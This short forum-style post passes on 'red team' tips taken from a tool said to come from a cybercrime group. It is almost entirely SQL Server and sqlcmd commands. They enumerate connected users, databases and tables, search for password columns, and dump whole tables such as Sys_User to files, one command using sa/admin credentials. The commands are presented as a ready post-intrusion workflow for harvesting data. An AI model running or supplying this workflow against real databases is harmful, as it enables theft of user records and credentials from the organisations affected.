Record a tips, maybe somebody&RT can use
The other day ON the T00ls forum, I saw a tool released by a black production team and documented some tips that the Red team could use
View the host name and user connected to the database
select loginame, hostname from sys.sysprocesses;
SELECT name FROM master.dbo.sysdatabases;
SELECT d.name, ROUND(SUM(mf.size) * 8 / 1024, 0) FROM sys.master_files mf INNER JOIN sys.databases d ON d.database_id = mf.database_id WHERE d.database_id > 4 GROUP BY d.name ORDER BY d.name;
Specifies all tables in the database
use LazyOA; exec sp_tables
Specifies the number of database rows
USE LazyOA SELECT TOP 100 s.Name AS SchemaName, t.Name AS TableName, p.rows AS RowCounts, CAST(ROUND((SUM(a.total_pages) / 128.00), 2) AS NUMERIC(36, 2)) AS Total_MB FROM sys.tables t INNER JOIN sys.indexes i ON t.OBJECT_ID = i.object_id INNER JOIN sys.partitions p ON i.object_id = p.OBJECT_ID AND i.index_id = p.index_id INNER JOIN sys.allocation_units a ON p.partition_id = a.container_id INNER JOIN sys.schemas s ON t.schema_id = s.schema_id GROUP BY t.Name, s.Name, p.Rows ORDER BY RowCounts desc, Total_MB desc;
Specifies the rows in the data table
select count(*) from LazyOA.dbo.Sys_Role;
Specifies the first 10 entries in the data table
select top 10 * from LazyOA.dbo.Sys_Role;
use LazyOA; select top 10 * from Sys_Role;
Specify database column name search
select COLUMN_NAME as 'ColumnName', TABLE_NAME as 'TableName' from LazyOA.INFORMATION_SCHEMA.COLUMNS where COLUMN_NAME like '%pass%';
Specifying data Export
local login
sqlcmd.exe -S localhost -E -Q "select * from %databasename%.dbo.%tablename%" -W -s"|" -o "C:\Windows\Temp\1.txt"
special login
sqlcmd.exe -S localhost -U sa -P admin -Q "select * from LazyOA.dbo.Sys_User" -W -s"|" -o "C:\Users\dbadmin\Desktop\1\1.txt"
